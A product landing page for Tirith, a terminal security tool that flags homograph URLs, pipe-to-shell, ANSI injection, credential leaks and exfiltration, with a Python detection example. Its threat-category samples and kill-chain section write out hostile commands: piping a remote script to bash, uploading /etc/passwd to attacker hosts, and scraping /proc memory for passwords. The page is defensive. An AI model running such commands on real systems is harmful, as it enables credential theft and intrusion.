Terminal Security for the Modern Stack

Your browser would catch this.
Your terminal won't.

Tirith intercepts commands and pastes in your terminal, detecting homograph attacks, pipe-to-shell patterns, ANSI injection, credential leaks, data exfiltration, and 80+ other threats — in under 1ms.

glyph-inspector
$ curl https://github.com/org/setup.sh
$ curl https://gіthub.com/org/setup.sh


DETECTION

What It Catches

15 threat categories covering every angle of terminal attack surface.

Hostname

CRITICAL

Homograph attacks, punycode, confusable characters, IDN spoofing

$ curl https://gіthub.com/install

Path

HIGH

Non-ASCII paths, homoglyphs, encoded traversal sequences

$ wget example.com/downloаd/v2.tar.gz

Transport

MEDIUM

Insecure HTTP, TLS downgrades, URL shorteners, data URIs

$ curl http://example.com/setup.sh

Terminal

CRITICAL

ANSI injection, bidi overrides, zero-width chars, control sequences

$ echo -e "\x1b[8mhidden"

Command

HIGH

Pipe-to-shell, dotfile persistence, archive bombs, code substitution

$ curl evil.com/run.sh | bash

Environment

HIGH

Proxy hijacking and environment variable manipulation

$ export HTTPS_PROXY=http://evil:8080

Ecosystem

HIGH

Git, Docker, pip, npm, Web3 — supply-chain attack surface

$ docker run --privileged alpine

Config Security

HIGH

AI config poisoning, prompt injection, MCP server validation

$ tirith scan --file .cursorrules

Rendered Content

HIGH

Hidden CSS, color-matched text, comment instructions, PDF hidden text

$ tirith scan --file page.html

Cloaking

HIGH

Server-side cloaking detection — different content for bots vs browsers

$ tirith fetch https://example.com

Policy

CRITICAL

Custom blocklists and organizational security policies

$ curl known-malware-domain.com

Credential Detection

CRITICAL

AWS keys, GitHub PATs, Stripe/Slack/SendGrid tokens, private keys, entropy-based secrets

$ curl -H "Authorization: AKIA..."

Data Exfiltration

HIGH

curl/wget uploads, env var leaks, command substitution sending data to external hosts

$ curl -d @/etc/passwd https://evil.com

Code Scanning

MEDIUM

Obfuscated payloads, dynamic code execution, secret exfiltration in JS/Python files

$ tirith scan evil_skill.py

Post-Compromise

CRITICAL

Process memory scraping, Docker escalation, credential file sweeps — TeamPCP-inspired

$ cat /proc/1/mem | strings | grep pass

REAL-WORLD DEFENSE

Supply Chain Is the New Attack Surface

TeamPCP compromised LiteLLM, Aqua Trivy, and Checkmarx in 5 days. No zero-day needed — just stolen credentials and commands your terminal happily executed.

Tirith won't stop a trojaned package from being installed. But it catches the payload before it does damage — cutting the blast radius at every stage of the kill chain.

Stage 1

Initial Access

UNDETECTABLE

Attack

Stolen credentials used to push trojaned package

LiteLLM, Aqua Trivy, Checkmarx — all in 5 days

Tirith Response

Outside terminal scope — tirith guards what runs after install

Stage 2

Credential Harvesting

BLOCKED

Attack

Payload exports API keys, tokens, and secrets from env vars

$AWS_SECRET_ACCESS_KEY, $GITHUB_TOKEN, $ANTHROPIC_API_KEY

Tirith Response

credential_leak + env_var_exfiltration

Stage 3

Memory Scraping

BLOCKED

Attack

Reads /proc/*/mem to extract secrets from running processes

Every secret in your CI runner or dev machine memory

Tirith Response

proc_memory_scraping

Stage 4

Privilege Escalation

BLOCKED

Attack

Mounts host root filesystem via Docker remote daemon

Full host access from inside a container

Tirith Response

docker_remote_escalation

Stage 5

Persistence

BLOCKED

Attack

Sweeps .aws/credentials, .ssh/id_rsa, .gnupg/ for lateral movement

Every credential file on disk

Tirith Response

credential_file_sweep

Stage 6

Exfiltration

BLOCKED

Attack

Uploads stolen data to attacker-controlled server via curl

curl -d @/etc/passwd https://c2.attacker.com/collect

Tirith Response

curl_data_upload + data_exfiltration

5 of 6 kill chain stages intercepted

Tirith can't prevent a compromised package from being published. But every post-install payload — credential theft, memory scraping, privilege escalation, exfiltration — gets caught before it does damage. That's the difference between a breach and a blocked command.

ARCHITECTURE

How It Works

A 3-tier pipeline that balances speed with thoroughness.

Tier 1

Fast Gate

< 0.1ms

Regex-powered initial filter eliminates 99% of clean commands instantly.

Tier 2

Extract

URL + Refs

Parses URLs, Docker references, and package identifiers from complex commands.

Tier 3

Analyze

80+ Rules

80+ rules across 15 categories — homographs, injection, supply-chain, credential detection, exfiltration, and more.
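
The three tiers as an added Python example (not Tirith's own code): a regex gate, URL extraction, then rules for mixed-script hostnames (the gіthub.com case above), punycode labels, plain HTTP, and pipe-to-shell. The rule names, the regexes, and the use of Unicode character names as a stand-in for the script property are assumptions made for this example.

```python
import re
import unicodedata
from urllib.parse import urlsplit

SHELL = r"\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b"
FAST_GATE = re.compile(r"[^\x00-\x7f]|https?://|" + SHELL)     # tier 1
URL_RE = re.compile(r"https?://[^\s'\"|;&<>]+")                # tier 2
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|]*" + SHELL)  # tier 3 rule


def scripts(label):
    # unicodedata has no Script property; the first word of the character
    # name (LATIN, CYRILLIC, GREEK, ...) stands in for it here.
    return {unicodedata.name(c, "UNKNOWN").split()[0] for c in label if c.isalpha()}


def decode_label(label):
    """Turn an xn-- (punycode) hostname label back into Unicode."""
    if not label.startswith("xn--"):
        return label
    try:
        return label[4:].encode("ascii").decode("punycode")
    except UnicodeError:
        return label


def analyze(command):
    """Return (rule, detail) findings; the rule names are illustrative."""
    if not FAST_GATE.search(command):        # tier 1: clean commands stop here
        return []
    findings = []
    for url in URL_RE.findall(command):      # tier 2: extract URLs
        parts = urlsplit(url)
        if parts.scheme == "http":
            findings.append(("plain_http", url))
        for label in (parts.hostname or "").split("."):
            text = decode_label(label)
            if len(scripts(text)) > 1:       # tier 3: Latin mixed with a lookalike
                odd = ", ".join(f"U+{ord(c):04X} at offset {i}"
                                for i, c in enumerate(text) if ord(c) > 0x7F)
                findings.append(("mixed_script_hostname", f"{text}: {odd}"))
    if PIPE_TO_SHELL.search(command):
        findings.append(("pipe_to_shell", command))
    return findings


if __name__ == "__main__":  # constructed samples; \u0456 is Cyrillic "i"
    for cmd in ("curl https://g\u0456thub.com/org/setup.sh",
                "curl http://example.com/setup.sh | bash"):
        print(cmd, "->", analyze(cmd))
```

A mixed-script check does not catch a hostname written entirely in one lookalike script; that needs a confusables table, which this example does not include.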

AI Agent Security

Protect AI coding agents at every layer — from the configs they read to the skills they download to the commands they execute. One command to set up. Zero friction on clean input.

MCP Server — 7 Tools

AI agents call these tools before taking action. Run tirith mcp-server to start.

tirith_check_command

Analyze shell commands

tirith_check_url

Score URLs for attacks

tirith_check_paste

Check pasted content

tirith_scan_file

Scan files for hidden content

tirith_scan_directory

Recursive directory scan

tirith_verify_mcp_config

Validate MCP configs

tirith_fetch_cloaking

Detect server-side cloaking

Skill & Plugin Scanning

Download skills, plugins, and MCP tools without worrying. Tirith scans every file for obfuscated payloads, dynamic code execution, and secret exfiltration before your agent runs it.

Config Poisoning

Scans 50+ AI config file patterns (.cursorrules, CLAUDE.md, .mcp.json, and more) for prompt injection, invisible Unicode, and permission bypass attempts.

Hidden Content

Detects content invisible to humans but readable by AI — CSS hiding, color tricks, sub-pixel PDF text, and HTML comment injection.

Server Cloaking

Compares responses across 6 user-agents to catch servers that serve different content to AI bots vs browsers.

One Command Setup

$ tirith setup claude-code --with-mcp
$ tirith setup codex
$ tirith setup cursor
$ tirith setup gemini-cli --with-mcp
$ tirith setup pi-cli
$ tirith setup vscode
$ tirith setup windsurf


CLI

Commands

Everything runs locally. Zero network calls unless you explicitly ask.

Analyze

tirith check -- <cmd>   Analyze a command without executing it
tirith paste            Check pasted content (auto-called by shell hooks)
tirith scan [path]      Scan files/dirs for hidden content, config poisoning, malicious code. Supports --sarif and --ci --fail-on high
tirith run <url>        Safe curl|bash replacement. Downloads, analyzes, shows SHA256, opens for review, executes after confirmation

Investigate

tirith score <url>      Break down a URL's trust signals
tirith diff <url>       Byte-level comparison showing where suspicious characters hide
tirith fetch <url>      Detect server-side cloaking (different content for bots vs browsers)
tirith why              Explain the last rule that triggered

Operate

tirith receipt          Track and verify scripts run through tirith run (last, list, verify)
tirith checkpoint       Snapshot files before risky operations, roll back if needed (create, restore, diff)
tirith audit            Audit log management for compliance (export, stats, report)

Setup

tirith setup <tool>     One-command setup for AI coding tools
tirith gateway run      MCP gateway proxy for intercepting AI agent shell tool calls
tirith init             Print the shell hook for your shell profile
tirith doctor           Diagnostic check for hook status and configuration
tirith mcp-server       Run as MCP server over JSON-RPC stdio

PRICING

Free for Everyone. Built for Teams.

All detection rules run at every tier. Paid plans add compliance, policy distribution, and enterprise integrations.

Community

Free forever

Everything you need for terminal security. No account required.

  • Full detection engine (all 80+ rules)
  • Shell hooks — Bash, Zsh, Fish, PowerShell
  • MCP server for AI coding tools
  • Local JSONL audit log
  • YAML policy system
  • SARIF output for CI/CD
  • Zero network calls — fully offline
  • Cross-platform — macOS, Linux, Windows
  • Open source

Team / Enterprise

Contact us

Everything in Community, plus:

  • MITRE ATT&CK technique mapping
  • Remote policy distribution
  • Centralized audit log collection
  • Custom DLP redaction patterns
  • Webhooks — Slack, Teams, PagerDuty
  • SSO/SAML — Okta, Azure AD
  • Air-gapped / on-premises deployment
  • Dedicated account manager & SLA

INSTALL

Installation

Install Tirith with your favorite package manager.

brew install sheeki03/tap/tirith

Shell Activation

# zsh (~/.zshrc)
eval "$(tirith init --shell zsh)"

# bash (~/.bashrc)
eval "$(tirith init --shell bash)"

# fish (~/.config/fish/config.fish)
tirith init --shell fish | source

# PowerShell ($PROFILE)
# tirith init --shell powershell | Invoke-Expression